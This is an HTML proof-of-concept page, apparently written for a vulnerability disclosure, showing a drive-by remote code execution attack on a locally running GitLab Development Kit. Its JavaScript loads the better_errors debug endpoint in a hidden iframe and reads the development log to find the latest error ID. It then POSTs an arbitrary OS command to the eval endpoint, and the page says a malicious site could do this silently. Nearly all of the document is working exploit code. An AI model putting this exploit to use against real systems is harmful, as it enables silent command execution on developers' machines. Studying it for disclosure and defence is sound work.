<!DOCTYPE html>
<html>

<head>
    <title>
        Localhost POC
    </title>
</head>

<body style="text-align:center;" id="body">
    <h1>
        GDK Drive-By RCE
    </h1>
    <p>
        If you have the GDK running locally, this will execute commands on your host OS.
        A malicious site could do this silently in the background, with no user interaction.<br><br>
        <input type="text" id="cmd" placeholder="OS Command to Exec">
        <button onclick="sendCmd()">Send Command</button>
    </p>
    <iframe src="http://localhost:3000/__better_errors" height="1" width="1" title="Iframe better errors" , id="better_errors_iframe"></iframe>
</body>

</html>


<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script>
function sendCmd() {

    let cmd = document.querySelector('#cmd');
    let payload = `\`${cmd.value}\``;
    let regex1 = /__better_errors\/([a-f0-9]{16})\/variables/g;
    let regex2 = /[a-f0-9]{16}/;
    let iFrame = document.getElementById('better_errors_iframe');

    for (let i = 0; i < 10; i++) { // Reloading the error iframe 10 times to be sure a new error is generated if there was not one already
        iFrame.src = iFrame.src;
    }

    // Allow the error to take
    sleep(3000)


    console.log("Downloading dev log for processing")
    let code = $.get("http://localhost:3808/log/development.log", function(contents) {
        console.log("Searching file for error codes")
        let matches = contents.match(regex1);
        let errorURL = matches[matches.length - 1];
        let code = errorURL.match(regex2)[0]

        //outputs true if contained, else false
        console.log("Most recent error code: " + code);

        // Creating a XHR object
        let xhr = new XMLHttpRequest();
        let url = "http://localhost:3000/__better_errors/" + code + "/eval";
        xhr.open("POST", url, true);
        xhr.setRequestHeader("Content-Type", "text/plain");
        xhr.setRequestHeader("Accept", "text/html");

        // Set payload data
        var data = JSON.stringify({
            "index": "0",
            "source": payload
        });

        // Send the request
        xhr.send(data);
    })
}

function sleep(milliseconds) {
    const date = Date.now();
    let currentDate = null;
    do {
        currentDate = Date.now();
    } while (currentDate - date < milliseconds);
}
</script>
